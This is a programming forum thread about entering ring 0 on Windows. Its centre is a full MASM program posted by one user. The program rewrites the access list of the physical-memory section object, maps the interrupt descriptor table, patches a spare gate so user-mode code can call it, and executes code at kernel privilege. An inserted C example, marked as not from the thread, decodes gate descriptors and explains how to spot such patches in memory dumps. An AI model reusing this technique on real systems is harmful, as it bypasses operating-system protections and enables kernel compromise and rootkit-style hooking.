
what can I do in ring0 state?

Started by asmZhou, November 17, 2006, 01:55:40 AM


asmZhou

    Hi everyone, I've just read some tricks for entering the ring0 state. I followed them and entered ring0 state successfully. But then I'm confused: I can't use any BIOS interrupts any more in that state, and can't access any specific memory (such as video memory, keyboard memory etc.) directly. So what can I do in ring0 state? And if there is any way to access the low-level resources, what's the way?
    Can anyone give me any advice? Thank you very much.

asmZhou

By the way, the system I'm working on is Windows 2003 Server.

hutch--

Zhou,

Normally ring0 access is obtained by writing a driver; apart from security breaches, there is little use for accessing ring0 apart from driver design. Tell us why you want ring0 access.
Download site for MASM32      New MASM Forum
https://masm32.com          https://masm32.com/board/index.php

asmZhou

  Yes, I know accessing ring0 needs a driver, and I just used a driver to enter ring0 (source code from the internet). But that example code just runs a simple instruction "mov eax,cr0" when it has entered ring0. I tried some other instructions, like some BIOS interrupt calls or instructions accessing memory directly, but failed.
    I studied and used asm programming during the "DOS" period, but dropped it for many years. I've been told that in a Windows system I cannot do everything I want like in DOS. This kindled my fight. But with the experience of these days, I know this is indeed not easy.

xandaz

   Hey there. This ring0 thingy seems interesting. Just the other day a guy came into this chat room I was in, looking for some answers regarding this. He wanted to switch to ring0 to debug a driver he was working on. I looked it up on the internet, but the examples I found are written either in C# or this strange ASM format. I couldn't really understand it. Can someone explain how to switch from normal to kernel mode? I don't understand much of those registers nor global descriptors.
   Ty guys

dedndave

that subject isn't expanded much in this forum, as it opens doors for malicious individuals
there have been a few times i wanted ring 0 access, myself
mainly, i would like to be able to perform direct I/O on the counter/timers and serial/parallel ports like i did under win 98
but, haven't had a pressing need for it just yet   :bg  i have looked around a little bit as well - it doesn't seem that difficult
i do, however, get the impression that programmers writing the code are intentionally cryptic about the method and intent - lol

ecube

here's the masm32 driver sdk http://www.freewebs.com/four-f/ , shows some neat things you can do if you like playing in kernel mode, aka ring 0, aka the ring of power. For win2k+ drivers are .sys and on Win ME and below drivers are .vxd, and the only info I know about vxd's is at http://win32assembly.online.fr/tutorials.html

japheth


For 32-bit Windows versions prior to Server 2003 (NT, 2k and XP), one can enter ring 0 directly from a Win32 application, without the help of a driver, if you have administrator privilege:



;--- ring0 access for NT platforms (NT4, 2000, XP; 32-bit)
;--- won't work with newer versions of this OS (Server 2003 and later
;--- refuse to open \device\physicalmemory from user mode)
;---
;--- method: get write access to the \device\physicalmemory section object,
;--- map the physical page(s) holding the IDT, point a spare interrupt
;--- gate (INTNUMBER) at ring0rou with DPL=3, execute "int INTNUMBER",
;--- then restore the original gate.

.386p                    ;'p' is needed for the privileged mov eax,cr0
.model flat, stdcall
option casemap:none

;--- ntdll
NtOpenSection    proto :ptr dword, :dword, :dword
;--- kernel32
ExitProcess      proto :dword
GetStdHandle     proto :dword
WriteFile        proto :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
CloseHandle      proto :dword
MapViewOfFile    proto :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
UnmapViewOfFile  proto :DWORD
LocalFree        proto :dword
GetLastError     proto
;--- advapi32
GetSecurityInfo  proto :dword, :dword, :dword, :dword, :dword, :dword, :dword, :dword
SetSecurityInfo  proto :dword, :dword, :dword, :dword, :dword, :dword, :dword
SetEntriesInAclA proto :dword, :dword, :dword, :dword
;--- user32
wvsprintfA       proto :dword, :dword, :dword

NULL                            equ     0
STD_OUTPUT_HANDLE               equ     -11
OBJ_CASE_INSENSITIVE            equ     40h
SECTION_MAP_WRITE               equ     2
SECTION_MAP_READ                equ     4
READ_CONTROL                    equ     20000h  ;standard rights: read the DACL ...
WRITE_DAC                       equ     40000h  ;... and rewrite it
DACL_SECURITY_INFORMATION       equ     4
SE_KERNEL_OBJECT                equ     6
GRANT_ACCESS                    equ     1
NO_MULTIPLE_TRUSTEE             equ     0
TRUSTEE_IS_NAME                 equ     1
TRUSTEE_IS_USER                 equ     1
INTNUMBER                       equ     0ffh    ;spare IDT vector we borrow
IDT_VIEW_SIZE                   equ     20000h  ;64K granularity slack + room for the 2K IDT

UNICODE_STRING struct
Length_       WORD ?
MaximumLength WORD ?
Buffer        DWORD ?;
UNICODE_STRING ends

OBJECT_ATTRIBUTES struct
Length_        DD ?
RootDirectory  DD ?
ObjectName     DD ?  ;ptr UNICODE_STRING
Attributes     DD ?
SecurityDescriptor DD ?
SecurityQualityOfService DD ?
OBJECT_ATTRIBUTES ends

TRUSTEE_A struct
pMultipleTrustee         DWORD ?
MultipleTrusteeOperation DWORD ?
TrusteeForm              DWORD ?
TrusteeType              DWORD ?
ptstrName                DWORD ?
TRUSTEE_A ends

EXPLICIT_ACCESS_A struct
grfAccessPermissions DWORD ?
grfAccessMode        DWORD ?
grfInheritance       DWORD ?
Trustee              TRUSTEE_A <>
EXPLICIT_ACCESS_A ends

;--- CStr() define a string in .CONST

CStr macro text:VARARG
local sym
.const
sym db text,0
.code
exitm <offset sym>
endm

;---- L() defines a wide string
;---- usage: StringName dw L(stringvalue)

L macro parms:VARARG
local wstr,i,c,tstr
wstr textequ <>
i = 0
for parm,<parms>
  c SubStr <parm>,1,1
  ifidn c,<">
tstr SubStr <parm>,2,@SizeStr(parm)-2
% forc chr$,<tstr>
  if i
wstr CatStr wstr,<,>
  endif
  wstr CatStr wstr,<'&chr$'>
  i = i + 1
endm
  else
if i
  wstr CatStr wstr,<,>
endif
wstr CatStr wstr,<parm>
  endif
endm
exitm <wstr>
endm

.data

align 4

object_buffer dw L("\device\physicalmemory")

align 4

object_name         UNICODE_STRING  {   sizeof object_buffer, sizeof object_buffer + 2, offset object_buffer }
object_attributes   OBJECT_ATTRIBUTES { sizeof OBJECT_ATTRIBUTES, 0, offset object_name, OBJ_CASE_INSENSITIVE, 0, 0 }

;--- the ACE we add: "current user may map the section for read/write"
explicit_access     EXPLICIT_ACCESS_A { SECTION_MAP_READ or SECTION_MAP_WRITE,
GRANT_ACCESS, 0,
{ NULL, NO_MULTIPLE_TRUSTEE, TRUSTEE_IS_NAME, TRUSTEE_IS_USER, offset szCurrent_user } }
szCurrent_user      db "CURRENT_USER", 0   ;special trustee name understood by SetEntriesInAcl

.code

printf  proc c uses ebx pszFormat:ptr BYTE, args:VARARG

local   dwWritten:DWORD
local   szOut[256]:byte

invoke GetStdHandle, STD_OUTPUT_HANDLE
mov ebx, eax
invoke wvsprintfA, addr szOut, pszFormat, addr args
lea ecx, dwWritten
invoke WriteFile, ebx, addr szOut, eax, ecx, NULL
ret
align 4
printf  endp

;--- the ring 0 routine. It runs on the kernel stack with interrupts
;--- disabled (interrupt gate), so keep it tiny: no API calls, nothing
;--- that may page-fault, no user-mode memory. mov eax,cr0 is privileged
;--- and would #GP in ring 3, so a returned value proves we were in ring 0.
ring0rou:
mov eax, cr0
iretd
align 4

main proc uses esi edi

local hSection:dword
local dacl:dword        ;current DACL (points into psd)
local newacl:dword      ;DACL with our ACE added (LocalFree it)
local psd:dword         ;security descriptor from GetSecurityInfo (LocalFree it)

;--- try to open "\device\physicalmemory" for reading and writing
invoke NtOpenSection, addr hSection, SECTION_MAP_READ or SECTION_MAP_WRITE, offset object_attributes
test eax, eax
jns hook_interrupt              ;NTSTATUS >= 0 means success

;--- call didn't succeed (by default only SYSTEM may write), must change the DACL:
;--- reopen with just the rights needed to read and rewrite the DACL

invoke NtOpenSection, addr hSection, READ_CONTROL or WRITE_DAC, offset object_attributes
test eax, eax
js error

;--- get the current DACL (and the security descriptor that owns it)

invoke GetSecurityInfo, hSection, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, addr dacl, NULL, addr psd
test eax, eax
jnz acl_error

;--- build new DACL = old DACL + explicit_access

invoke SetEntriesInAclA, 1, offset explicit_access, dacl, addr newacl
test eax, eax
jnz acl_error

;--- apply it to the section object. Passing NULL instead of newacl also
;--- works, but a NULL DACL hands physical memory to every user on the box.

invoke SetSecurityInfo, hSection, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, newacl, NULL
push eax
invoke LocalFree, newacl
invoke LocalFree, psd
invoke CloseHandle, hSection
pop eax
test eax, eax
jnz acl_error

;--- retry to open "\device\physicalmemory" for reading and writing
invoke NtOpenSection, addr hSection, SECTION_MAP_READ or SECTION_MAP_WRITE, offset object_attributes
test eax, eax
js error

hook_interrupt:
;--- read the IDT base: SIDT stores 6 bytes (16-bit limit, then 32-bit base);
;--- store it 2 bytes below the pushed dword so the base lands exactly at [esp]
push eax
sidt fword ptr [esp - 2]
pop esi

;--- linear -> physical: the IDT lives in the kernel's identity-mapped range,
;--- so physical = linear - 80000000h (assumes the default 2GB/2GB split, no /3GB)
btr esi, 1fh

;--- MapViewOfFile wants an offset aligned to the 64K allocation granularity:
;--- map from the aligned address and keep the remainder as an offset into the view
mov edx, esi
and edx, not 0ffffh
and esi, 0ffffh
invoke MapViewOfFile, hSection, SECTION_MAP_WRITE, 0, edx, IDT_VIEW_SIZE
test eax, eax
jz map_error
mov edi, eax                            ;view base, needed for UnmapViewOfFile
lea esi, [eax + esi + INTNUMBER * 8]    ;-> the 8-byte gate descriptor of vector INTNUMBER

;--- patch the gate. Layout: offset[15:0], selector, reserved, type/DPL byte, offset[31:16]
fild qword ptr [esi]           ;save gate (fild/fistp round-trip a 64-bit integer exactly)
mov eax, offset ring0rou
mov word ptr [esi + 0], ax     ;set LOWORD(eip)
mov word ptr [esi + 2], 8      ;selector 8 = NT's ring 0 code segment
mov byte ptr [esi + 5], 0eeh   ;P=1, DPL=3 (usable from ring 3), type 0Eh = 32-bit interrupt gate
shr eax, 16
mov word ptr [esi + 6], ax     ;set HIWORD(eip)
int INTNUMBER                  ;-> ring0rou, comes back here with eax = CR0
fistp qword ptr [esi]          ;restore gate

push eax
invoke UnmapViewOfFile, edi
invoke CloseHandle, hSection
pop eax

invoke printf, CStr("CR0=%X",13,10), eax
ret
error:
invoke printf, CStr("NtOpenSection() failed [%X]",13,10), eax
ret
acl_error:
invoke printf, CStr("changing the DACL of \device\physicalmemory failed [%X]",13,10), eax
ret
map_error:
invoke GetLastError
invoke printf, CStr("MapViewOfFile() failed [%X]",13,10), eax
invoke CloseHandle, hSection
ret
align 4
main endp

start:
call main
invoke ExitProcess, 0

end start
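
The bytes the program above pokes into the IDT entry (offset halves at [esi+0] and [esi+6], selector 8 at [esi+2], the 0EEh type/DPL byte at [esi+5]) follow Intel's 32-bit gate descriptor layout. The following C program is an added example, not code from the thread or from japheth: it encodes and decodes such a descriptor on constructed bytes, reproduces the post's patch, and flags the property that makes the patched vector reachable from user mode (present, DPL 3). The handler addresses used as input are made up for the demonstration.

```c
/* Added example: 32-bit IDT gate descriptor encode/decode (host-side only,
 * works on constructed bytes; it never touches a live IDT). */
#include <stdint.h>
#include <stdio.h>

#define GATE_TYPE_INTR32 0x0E  /* 32-bit interrupt gate: CPU clears IF on entry */
#define GATE_TYPE_TRAP32 0x0F  /* 32-bit trap gate: IF left unchanged */

struct gate {
    uint32_t offset;   /* linear address of the handler */
    uint16_t selector; /* code segment selector; 8 is NT's ring 0 code segment */
    uint8_t  type;     /* GATE_TYPE_INTR32 or GATE_TYPE_TRAP32 */
    uint8_t  dpl;      /* highest ring allowed to execute INT n on this vector */
    uint8_t  present;
};

/* Byte layout the CPU reads: 0-1 offset[15:0], 2-3 selector, 4 reserved (0),
 * 5 = P<<7 | DPL<<5 | type, 6-7 offset[31:16]. */
void gate_encode(const struct gate *g, uint8_t out[8])
{
    out[0] = (uint8_t)(g->offset & 0xFF);
    out[1] = (uint8_t)((g->offset >> 8) & 0xFF);
    out[2] = (uint8_t)(g->selector & 0xFF);
    out[3] = (uint8_t)(g->selector >> 8);
    out[4] = 0;
    out[5] = (uint8_t)(((g->present & 1) << 7) | ((g->dpl & 3) << 5) | (g->type & 0x0F));
    out[6] = (uint8_t)((g->offset >> 16) & 0xFF);
    out[7] = (uint8_t)(g->offset >> 24);
}

void gate_decode(const uint8_t in[8], struct gate *g)
{
    g->offset   = (uint32_t)in[0] | ((uint32_t)in[1] << 8) |
                  ((uint32_t)in[6] << 16) | ((uint32_t)in[7] << 24);
    g->selector = (uint16_t)(in[2] | (in[3] << 8));
    g->type     = in[5] & 0x0F;
    g->dpl      = (in[5] >> 5) & 3;
    g->present  = in[5] >> 7;
}

/* Same edit the MASM code performs in place: new offset, selector 8,
 * type/DPL byte 0xEE (P=1, DPL=3, 32-bit interrupt gate); byte 4 untouched. */
void gate_patch_like_post(uint8_t gate[8], uint32_t handler)
{
    gate[0] = (uint8_t)(handler & 0xFF);
    gate[1] = (uint8_t)((handler >> 8) & 0xFF);
    gate[2] = 8;
    gate[3] = 0;
    gate[5] = 0xEE;
    gate[6] = (uint8_t)((handler >> 16) & 0xFF);
    gate[7] = (uint8_t)(handler >> 24);
}

/* What to look for when auditing an IDT dump: a present gate with DPL 3 can be
 * triggered by any ring 3 code with INT n, so its handler had better be kernel code. */
int gate_is_user_callable(const uint8_t in[8])
{
    struct gate g;
    gate_decode(in, &g);
    return g.present && g.dpl == 3;
}

int main(void)
{
    /* constructed: a present, DPL 0 vector whose handler sits in kernel space */
    struct gate orig = { 0x8053A6B0u, 8, GATE_TYPE_INTR32, 0, 1 }, g;
    uint8_t vec[8];

    gate_encode(&orig, vec);
    printf("before: type/dpl byte=%02X user-callable=%d\n", vec[5], gate_is_user_callable(vec));

    gate_patch_like_post(vec, 0x00401000u);   /* constructed user-mode handler address */
    gate_decode(vec, &g);
    printf("after : offset=%08X sel=%u type=%X dpl=%u user-callable=%d\n",
           g.offset, g.selector, g.type, g.dpl, gate_is_user_callable(vec));
    return 0;
}
```

The decoder is also the quickest way to read an IDT dump taken from a debugger or a forensic memory image: any vector with DPL 3 and an offset below the kernel base is exactly the state the program above leaves behind between the patch and the restore.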

vanjast

Be careful with Ring0, if you do not do things properly, you'll 'bomb' the system - Be ready for many re-installs or restarts - Have a CD-Boot utility disk on hand to correct your 'mess ups'  :bg MS doesn't always give out this info, for their own (OS) protection.
:8)

Slugsnack

Quote from: vanjast on December 16, 2009, 12:52:22 PM
Be careful with Ring0, if you do not do things properly, you'll 'bomb' the system - Be ready for many re-installs or restarts - Have a CD-Boot utility disk on hand to correct your 'mess ups'  :bg MS doesn't always give out this info, for their own (OS) protection.
:8)
Orrrrrrr be smart and do it in a VM